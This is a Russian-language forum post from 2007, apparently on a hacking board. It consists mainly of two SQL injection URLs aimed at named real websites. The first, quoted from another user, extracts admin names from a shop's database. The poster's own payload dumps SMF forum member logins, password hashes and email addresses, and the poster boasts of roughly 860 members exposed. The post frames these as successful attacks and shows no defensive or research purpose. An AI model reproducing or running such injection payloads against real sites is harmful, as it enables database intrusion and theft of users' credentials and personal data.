15.03.2007, 22:39
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами:
10160966
Репутация:
1719
|
|
Сообщение от Ksander
мм
Код:
http://shop.turistua.com/index.php?x_id=-1+union+select+concat(name,char(58),user())+from+admin/*
молодец, я как-то пропустил))
все гениальное - просто)
не как моя следующая инъекция)) пришлось качать smf, чтоб посмотреть названия колонок и таблиц в install.sql
Код:
http://www.dsrevolution.com/article.php?articleid=-1+union+select+1,2,3,4,5,6,7,concat(memberName,0x3a,passwd,0x3a,emailAddress),9,10,11,12,13,14+from+smf_members+limit+0,1/*
860±10 мемберов
login:рass:mail
|
|
|